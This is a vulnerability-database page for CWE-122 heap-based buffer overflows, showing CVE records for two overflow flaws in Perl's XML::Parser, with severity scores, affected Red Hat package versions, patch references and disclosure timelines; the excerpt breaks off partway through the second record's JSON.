Common Weakness Enumeration

CWE-122

Allowed

Heap-based Buffer Overflow

Abstraction: Variant · Status: Draft

A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc().

4111 vulnerabilities reference this CWE, most recent first.

CVE-2006-10003 (GCVE-0-2006-10003)

Vulnerability from cvelistv5 – Published: 2026-03-19 11:08 – Updated: 2026-07-15 01:28
VLAI
Title
XML::Parser versions through 2.47 for Perl has an off-by-one heap buffer overflow in st_serial_stack
Summary
XML::Parser versions through 2.47 for Perl has an off-by-one heap buffer overflow in st_serial_stack. In the case (stackptr == stacksize - 1), the stack will NOT be expanded. Then the new value will be written at location (++stackptr), which equals stacksize and therefore falls just outside the allocated buffer. The bug can be observed when parsing an XML file with very deep element nesting
SSVC
Exploitation: none Automatable: yes Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
References
URL Tags
https://rt.cpan.org/Ticket/Display.html?id=19860 issue-tracking
https://github.com/cpan-authors/XML-Parser/issues/39 issue-tracking
https://github.com/cpan-authors/XML-Parser/commit… patch
http://www.openwall.com/lists/oss-security/2026/03/19/2
https://lists.debian.org/debian-lts-announce/2026…
https://access.redhat.com/security/cve/CVE-2006-10003 vdb-entryx_refsource_REDHAT
https://bugzilla.redhat.com/show_bug.cgi?id=2448999 issue-trackingx_refsource_REDHAT
https://security.access.redhat.com/data/csaf/v2/v… x_sadp-csaf-vex
https://access.redhat.com/errata/RHSA-2026:8578 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:9110 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:7680 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:7681 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:8609 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:8608 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:8610 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:8577 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:9246 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:9258 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:9259 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:9605 vendor-advisoryx_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2026:7679 vendor-advisoryx_refsource_REDHAT
Impacted products
Vendor Product Version
TODDR XML::Parser Affected: 0 , ≤ 2.47 (custom)
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 10 Unaffected: 0:2.47-6.1.el10_1 , < * (rpm)
    cpe:/o:redhat:enterprise_linux:10.1
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 10.0 Extended Update Support Unaffected: 0:2.47-6.el10_0.1 , < * (rpm)
    cpe:/o:redhat:enterprise_linux_eus:10.0
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 7 Extended Lifecycle Support Unaffected: 0:2.41-10.el7_9.1 , < * (rpm)
    cpe:/o:redhat:rhel_els:7
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 8 Unaffected: 0:2.44-12.el8_10 , < * (rpm)
    cpe:/a:redhat:enterprise_linux:8
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 8.2 Advanced Update Support Unaffected: 0:2.44-11.el8_2.1 , < * (rpm)
    cpe:/a:redhat:rhel_aus:8.2
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support Unaffected: 0:2.44-11.el8_4.1 , < * (rpm)
    cpe:/a:redhat:rhel_aus:8.4
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 8.4 Extended Update Support Long-Life Add-On Unaffected: 0:2.44-11.el8_4.1 , < * (rpm)
    cpe:/a:redhat:rhel_eus_long_life:8.4
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support Unaffected: 0:2.44-11.el8_6.1 , < * (rpm)
    cpe:/a:redhat:rhel_aus:8.6
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 8.6 Telecommunications Update Service Unaffected: 0:2.44-11.el8_6.1 , < * (rpm)
    cpe:/a:redhat:rhel_tus:8.6
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions Unaffected: 0:2.44-11.el8_6.1 , < * (rpm)
    cpe:/a:redhat:rhel_e4s:8.6
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 8.8 Telecommunications Update Service Unaffected: 0:2.44-11.el8_8.1 , < * (rpm)
    cpe:/a:redhat:rhel_tus:8.8
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 8.8 Update Services for SAP Solutions Unaffected: 0:2.44-11.el8_8.1 , < * (rpm)
    cpe:/a:redhat:rhel_e4s:8.8
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 9 Unaffected: 0:2.46-9.1.el9_7 , < * (rpm)
    cpe:/a:redhat:enterprise_linux:9
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions Unaffected: 0:2.46-9.el9_0.1 , < * (rpm)
    cpe:/a:redhat:rhel_e4s:9.0
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions Unaffected: 0:2.46-9.el9_2.1 , < * (rpm)
    cpe:/a:redhat:rhel_e4s:9.2
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 9.4 Extended Update Support Unaffected: 0:2.46-9.el9_4.1 , < * (rpm)
    cpe:/a:redhat:rhel_eus:9.4
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 9.6 Extended Update Support Unaffected: 0:2.46-9.el9_6.1 , < * (rpm)
    cpe:/a:redhat:rhel_eus:9.6
Create a notification for this product.
Red Hat Red Hat Enterprise Linux 6     cpe:/o:redhat:enterprise_linux:6
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.8,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2006-10003",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-19T17:08:41.621885Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-19T17:09:59.672Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2026-04-04T08:11:42.558Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "http://www.openwall.com/lists/oss-security/2026/03/19/2"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00002.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/o:redhat:enterprise_linux:10.1"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 10",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.47-6.1.el10_1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/o:redhat:enterprise_linux_eus:10.0"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 10.0 Extended Update Support",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.47-6.el10_0.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/o:redhat:rhel_els:7"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 7 Extended Lifecycle Support",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.41-10.el7_9.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:enterprise_linux:8"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 8",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.44-12.el8_10",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_aus:8.2"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 8.2 Advanced Update Support",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.44-11.el8_2.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_aus:8.4"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.44-11.el8_4.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_eus_long_life:8.4"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 8.4 Extended Update Support Long-Life Add-On",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.44-11.el8_4.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_aus:8.6"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.44-11.el8_6.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_tus:8.6"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 8.6 Telecommunications Update Service",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.44-11.el8_6.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_e4s:8.6"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.44-11.el8_6.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_tus:8.8"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 8.8 Telecommunications Update Service",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.44-11.el8_8.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_e4s:8.8"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 8.8 Update Services for SAP Solutions",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.44-11.el8_8.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:enterprise_linux:9"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 9",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.46-9.1.el9_7",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_e4s:9.0"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.46-9.el9_0.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_e4s:9.2"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.46-9.el9_2.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_eus:9.4"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 9.4 Extended Update Support",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.46-9.el9_4.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/a:redhat:rhel_eus:9.6"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 9.6 Extended Update Support",
            "vendor": "Red Hat",
            "versions": [
              {
                "lessThan": "*",
                "status": "unaffected",
                "version": "0:2.46-9.el9_6.1",
                "versionType": "rpm"
              }
            ]
          },
          {
            "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
            "cpes": [
              "cpe:/o:redhat:enterprise_linux:6"
            ],
            "defaultStatus": "affected",
            "packageName": "perl-XML-Parser",
            "product": "Red Hat Enterprise Linux 6",
            "vendor": "Red Hat"
          }
        ],
        "datePublic": "2026-03-19T11:08:04.341Z",
        "descriptions": [
          {
            "lang": "en",
            "value": "A flaw was found in XML::Parser, a Perl module for parsing XML. This vulnerability, an off-by-one heap buffer overflow, occurs when processing an XML file with very deep element nesting. A remote attacker could exploit this by providing a specially crafted XML file, potentially leading to memory corruption."
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "namespace": "https://access.redhat.com/security/updates/classification/",
                "value": "Important"
              },
              "type": "Red Hat severity rating"
            }
          },
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 8.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "REQUIRED",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
              "version": "3.1"
            },
            "format": "CVSS"
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-193",
                "description": "Off-by-one Error",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-07-15T01:28:08.168Z",
          "orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
          "shortName": "redhat-SADP"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/security/cve/CVE-2006-10003"
          },
          {
            "name": "RHBZ#2448999",
            "tags": [
              "issue-tracking",
              "x_refsource_REDHAT"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448999"
          },
          {
            "tags": [
              "x_sadp-csaf-vex"
            ],
            "url": "https://security.access.redhat.com/data/csaf/v2/vex/2006/cve-2006-10003.json"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:8578"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:9110"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:7680"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:7681"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:8609"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:8608"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:8610"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:8577"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:9246"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:9258"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:9259"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:9605"
          },
          {
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2026:7679"
          }
        ],
        "solutions": [
          {
            "lang": "en",
            "value": "RHSA-2026:8578: Red Hat Enterprise Linux Server (v. 7 ELS)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:9110: Red Hat Enterprise Linux AppStream EUS (v. 10.0)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:7680: Red Hat Enterprise Linux AppStream (v. 10)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:7681: Red Hat Enterprise Linux AppStream (v. 8)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:8609: Red Hat Enterprise Linux AppStream AUS (v. 8.2)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:8608: Red Hat Enterprise Linux AppStream AUS (v.8.4), Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:8610: Red Hat Enterprise Linux AppStream AUS (v.8.6), Red Hat Enterprise Linux AppStream E4S (v.8.6), Red Hat Enterprise Linux AppStream TUS (v.8.6)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:8577: Red Hat Enterprise Linux AppStream E4S (v.8.8), Red Hat Enterprise Linux AppStream TUS (v.8.8)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:9246: Red Hat Enterprise Linux AppStream E4S (v.9.0)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:9258: Red Hat Enterprise Linux AppStream E4S (v.9.2)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:9259: Red Hat Enterprise Linux AppStream EUS (v.9.4)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:9605: Red Hat Enterprise Linux AppStream EUS (v.9.6)"
          },
          {
            "lang": "en",
            "value": "RHSA-2026:7679: Red Hat Enterprise Linux AppStream (v. 9)"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2026-03-19T12:01:39.997Z",
            "value": "Reported to Red Hat."
          },
          {
            "lang": "en",
            "time": "2026-03-19T11:08:04.341Z",
            "value": "Made public."
          }
        ],
        "title": "perl-xml-parser: XML::Parser: Memory corruption via deeply nested XML files",
        "workarounds": [
          {
            "lang": "en",
            "value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
          }
        ],
        "x_adpType": "supplier",
        "x_generator": {
          "engine": "sadp-cli 1.0.0"
        }
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://cpan.org/modules",
          "defaultStatus": "unaffected",
          "packageName": "XML-Parser",
          "product": "XML::Parser",
          "programFiles": [
            "Expat.xs"
          ],
          "programRoutines": [
            {
              "name": "startElement"
            }
          ],
          "repo": "http://github.com/toddr/XML-Parser",
          "vendor": "TODDR",
          "versions": [
            {
              "lessThanOrEqual": "2.47",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "XML::Parser versions through 2.47 for Perl has an off-by-one heap buffer overflow in st_serial_stack.\n\nIn the case (stackptr == stacksize - 1), the stack will NOT be expanded. Then the new value will be written at location (++stackptr), which equals stacksize and therefore falls just outside the allocated buffer.\n\nThe bug can be observed when parsing an XML file with very deep element nesting"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-193",
              "description": "CWE-193 Off-by-one Error",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-122",
              "description": "CWE-122 Heap-based Buffer Overflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-19T11:08:04.341Z",
        "orgId": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
        "shortName": "CPANSec"
      },
      "references": [
        {
          "tags": [
            "issue-tracking"
          ],
          "url": "https://rt.cpan.org/Ticket/Display.html?id=19860"
        },
        {
          "tags": [
            "issue-tracking"
          ],
          "url": "https://github.com/cpan-authors/XML-Parser/issues/39"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/cpan-authors/XML-Parser/commit/3eb9cc95420fa0c3f76947c4708962546bf27cfd.patch"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Apply the patch that has been publicly available since 2006-06-13 or upgrade to version 2.48 or later when it is released."
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "timeline": [
        {
          "lang": "en",
          "time": "2006-06-13T00:00:00.000Z",
          "value": "Issue logged and patch provided in Request Tracker for XML::Parser"
        },
        {
          "lang": "en",
          "time": "2019-09-23T00:00:00.000Z",
          "value": "Issue migrated to github issue tracker"
        },
        {
          "lang": "en",
          "time": "2019-09-24T00:00:00.000Z",
          "value": "Patch provided in github issue tracker"
        },
        {
          "lang": "en",
          "time": "2026-03-16T00:00:00.000Z",
          "value": "PR created and commit merged to git repo"
        }
      ],
      "title": "XML::Parser versions through 2.47 for Perl has an off-by-one heap buffer overflow in st_serial_stack",
      "workarounds": [
        {
          "lang": "en",
          "value": "Apply the patch that has been publicly available since 2006-06-13."
        }
      ],
      "x_generator": {
        "engine": "cpansec-cna-tool 0.1"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
    "assignerShortName": "CPANSec",
    "cveId": "CVE-2006-10003",
    "datePublished": "2026-03-19T11:08:04.341Z",
    "dateReserved": "2026-03-16T22:52:39.890Z",
    "dateUpdated": "2026-07-15T01:28:08.168Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2006-10002 (GCVE-0-2006-10002)

Vulnerability from cvelistv5 – Published: 2026-03-19 11:03 – Updated: 2026-04-29 14:36
VLAI
Title
XML::Parser versions through 2.45 for Perl could overflow the pre-allocated buffer size cause a heap corruption (double free or corruption) and crashes
Summary
XML::Parser versions through 2.45 for Perl could overflow the pre-allocated buffer size cause a heap corruption (double free or corruption) and crashes. A :utf8 PerlIO layer, parse_stream() in Expat.xs could overflow the XML input buffer because Perl's read() returns decoded characters while SvPV() gives back multi-byte UTF-8 bytes that can exceed the pre-allocated buffer size. This can cause heap corruption (double free or corruption) and crashes.
SSVC
Exploitation: none Automatable: yes Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
  • CWE-122 - Heap-based Buffer Overflow
  • CWE-176 - Improper Handling of Unicode Encoding
Assigner
Impacted products
Vendor Product Version
TODDR XML::Parser Affected: 0 , ≤ 2.45 (custom)
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.8,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2006-10002",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-19T17:11:03.634936Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-29T14:36:41.837Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2026-03-22T23:06:42.361Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "http://www.openwall.com/lists/oss-security/2026/03/19/1"
          },
          {
            "url": "http://www.openwall.com/lists/oss-security/2026/03/22/3"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://cpan.org/modules",
          "defaultStatus": "unaffected",
          "packageName": "XML-Parser",
          "product": "XML::Parser",
          "programFiles": [
            "Expat.xs"
          ],
          "programRoutines": [
            {
              "name": "parse_stream"
            }
          ],
          "repo": "http://github.com/toddr/XML-Parser",
          "vendor": "TODDR",
          "versions": [
            {
              "lessThanOrEqual": "2.45",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "XML::Parser versions through 2.45 for Perl could overflow the pre-allocated buffer size cause a heap corruption (double free or corruption) and crashes.\n\nA :utf8 PerlIO layer, parse_stream() in Expat.xs could overflow the XML input buffer because Perl\u0027s read() returns decoded characters while SvPV() gives back multi-byte UTF-8 bytes that can exceed the pre-allocated buffer size. This can cause heap corruption (double free or corruption) and crashes."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-122",
              "description": "CWE-122 Heap-based Buffer Overflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-176",
              "description": "CWE-176 Improper Handling of Unicode Encoding",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-21T11:43:43.607Z",
        "orgId": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
        "shortName": "CPANSec"
      },
      "references": [
        {
          "tags": [
            "issue-tracking"
          ],
          "url": "https://rt.cpan.org/Ticket/Display.html?id=19859"
        },
        {
          "tags": [
            "issue-tracking"
          ],
          "url": "https://github.com/cpan-authors/XML-Parser/issues/64"
        },
        {
          "tags": [
            "release-notes"
          ],
          "url": "https://metacpan.org/release/TODDR/XML-Parser-2.46/changes"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/cpan-authors/XML-Parser/commit/56b0509dfc6b559cd7555ea81ee62e3622069255.patch"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Apply the patch that has been publicly available since 2006-06-13 or upgrade to version 2.46 or later."
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "timeline": [
        {
          "lang": "en",
          "time": "2006-06-13T00:00:00.000Z",
          "value": "Issue logged in Request Tracker for XML::Parser"
        },
        {
          "lang": "en",
          "time": "2006-08-11T00:00:00.000Z",
          "value": "Patch provided in Request Tracker for XML::Parser"
        },
        {
